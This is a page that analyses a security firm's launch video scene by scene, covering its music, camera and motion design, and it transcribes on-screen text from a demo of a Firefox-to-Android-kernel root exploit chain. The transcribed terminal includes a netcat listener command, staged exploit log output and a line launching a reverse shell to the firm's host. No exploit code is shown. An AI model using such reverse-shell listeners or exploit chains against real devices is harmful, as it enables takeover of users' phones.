Nebula Security

Nebula Security · Launch Video Breakdown: Hook, Pacing & Motion Design

YC-backed security research, starting with an Android 17 root demo.

Developer ToolsLaunchJune 24, 2026@nebusecurity
0:00 · The Hook · Android 17 Root Demo Setup
0:00 / 0:00

Scene-by-scene timeline & spoken transcript

  1. The Hook

    Android 17 Root Demo Setup

    “(No spoken dialogue — The track begins with a sustained, evolving pad sound, creating an atmospheric and slightly mysterious mood. At 00:05, a subtle, high-frequency riser begins, building tension. This culminates in a significant sub-bass drop/impact at 00:07.)”

    On screen
    8:58 Search Settings Connected devices Bluetooth, pairing Apps Assistant, recent apps, default apps Notifications Notification history, conversations Sound & vibration Volume and haptics Modes Do Not Disturb, Bedtime, Driving Display & touch Dark theme, font size, touch Wallpaper & style Colors, themed icons, app grid Storage 14% used - 110 GB free Battery 100% System Languages, gestures, time Software updates Your device is up to date System update Updated to June 5, 2026 Google Play system update May 1, 2026 App updates Check for updates Android 17
    Camera
    Static shot of an Android phone screen, then a split-screen view with a terminal on the right.
    Motion
    Split-screen reveal, text fade-in.
  2. Problem Agitation

    Firefox Exploit Chain Execution

    “(No spoken dialogue — Followed by a rhythmic, pulsing synth bass and a driving, almost industrial-sounding percussion loop. A high-energy sweep effect is noticeable at 00:14, leading into a more pronounced rhythmic section with additional percussive elements.)”

    On screen
    8:58 vega@nebusec:~$ nc vega@nebusec:~$ nc -lvnp 4444 Listening on 0.0.0.0 4444 http://rootme.nebusec.ai/index.html Google Search Firefox v151.0.2 and below [*] firefox 151.0, still alive :) Exploit made with love by: Nebusec [*] Browser attempt 1/8 [*] Fetch exploit from rootme.nebusec.ai [*] Browser memory stage starting [*] Browser write stage ready [*] Browser read stage ready [*] leak obj=0x6bb47a1aa8 [*] shape=0x6bb55fe7f0 [*] Browser address stage ready [*] Browser consistency check passed [*] write to 0x6bb5604220 [*] Browser primitive ready [*] jsbase=0x6cdb6da000 [*] call target=0x701ad279c0 [*] Browser execution stage ready [*] Launching native stage [*] Native launcher returned [*] Browser stage complete Exploit Android kernel to gain root privilege
    Camera
    Static split-screen, focusing on the terminal output and browser interaction.
    Motion
    Rapid text typing animation, dynamic text highlights, subtle glow effects on key text.
  3. Product Reveal

    Root Privilege & Nebula Security Reveal

    “(No spoken dialogue — Another impactful sub-bass drop occurs at 00:22, introducing a new melodic synth layer that is both ethereal and slightly melancholic. The intensity builds again with a riser at 00:30, leading to a powerful sub-bass impact at 00:32, where the main rhythmic elements return with more force. A distinct high-energy sweep is heard at 00:40, followed by a brief pause and then a final, sustained sub-bass impact at 00:42.)”

    On screen
    9:00 vega@nebusec:~$ nc -lvnp 4444 Listening on 0.0.0.0 4444 [*] Browser decoded embedded payload [*] Native retry loop starting [*] Native attempt 1 [*] Native payload start pid=8261 [*] ashmem path=/dev/ashmemc2cfecaa-fe8a-4b11-966f-5a89c4592145 [*] stage 1 workspace ready [*] stage 1 sample accepted [*] stage 1 complete base=ffffffffd628210000 [*] stage 2 workspace ready [*] result memory=0 root=0 kaslr=1 base=ffffffffd628210000 uid=4294967295- 4294967295 selinux=255->255 control=-1/0 [*] Native attempt 2 [*] ashmem path=/dev/ashmemc2cfecaa-fe8a-4b11-966f-5a89c4592145 [*] stage 1 workspace ready [*] stage 1 sample accepted [*] stage 2 workspace ready [*] stage 3 candidate ready [*] root ready uid=10290-> euid=0 gid=0 egid=0 selinux_write=0/0 [*] reverse shell launching target=rootme.nebusec.ai:4444 [*] result memory=1 root=1 kaslr=1 base=ffffffffd628210000 uid=10290->0 Showcase kernel version and user id Sat, Jun 20 NEBULA SECURITY nebusec ROOT by IonStack
    Camera
    Split-screen continues, then transitions to a full-screen logo reveal with subtle background animation.
    Motion
    Text reveal with a 'glitch' or 'scanline' effect, logo animation with a subtle pulse, app icon changes.
  4. Call to Action

    IonStack & Nebula Security Value Proposition

    “(No spoken dialogue — Which then fades out with a lingering, resonant synth pad.)”

    On screen
    IonMonkey Stack Use-After-Free IonStack Full chain exploit from Firefox to Kernel Found by VEGA, demonstrated by Nebula Security Code scanning tool for 0-day vulnerabilities Linux Chrome nginx WordPress Firefox Android Windows QuickJS CPython Suricata Elite security expertise built into your product AN AI-NATIVE CYBERSECURITY COMPANY NEBULA SECURITY BACKED BY Y Y Combinator nebusec.ai
    Camera
    Static full-screen shots with animated text and iconography.
    Motion
    Text wipe/reveal, icon grid animation, subtle background parallax, logo animation.

Related Developer Tools Product Launches

Explore all Developer Tools launches →
SpaceXAI
Hook 8.9204.0M
SpaceXAIDeveloper Tools

xAI opens voice cloning on its API: build a custom voice in about two minutes or pick from 80+ voices in 28 languages.

@SpaceXAI
Claude
Hook 9.178.3M
ClaudeDeveloper Tools

Claude can now operate your Mac, opening apps, browsing and filling spreadsheets, as a research preview in Cowork and Claude Code.

@claudeai
xAI
Hook 8.873.2M
xAIDeveloper Tools

Agentic CLI for coding, building apps, and automating workflows.

@SpaceXAI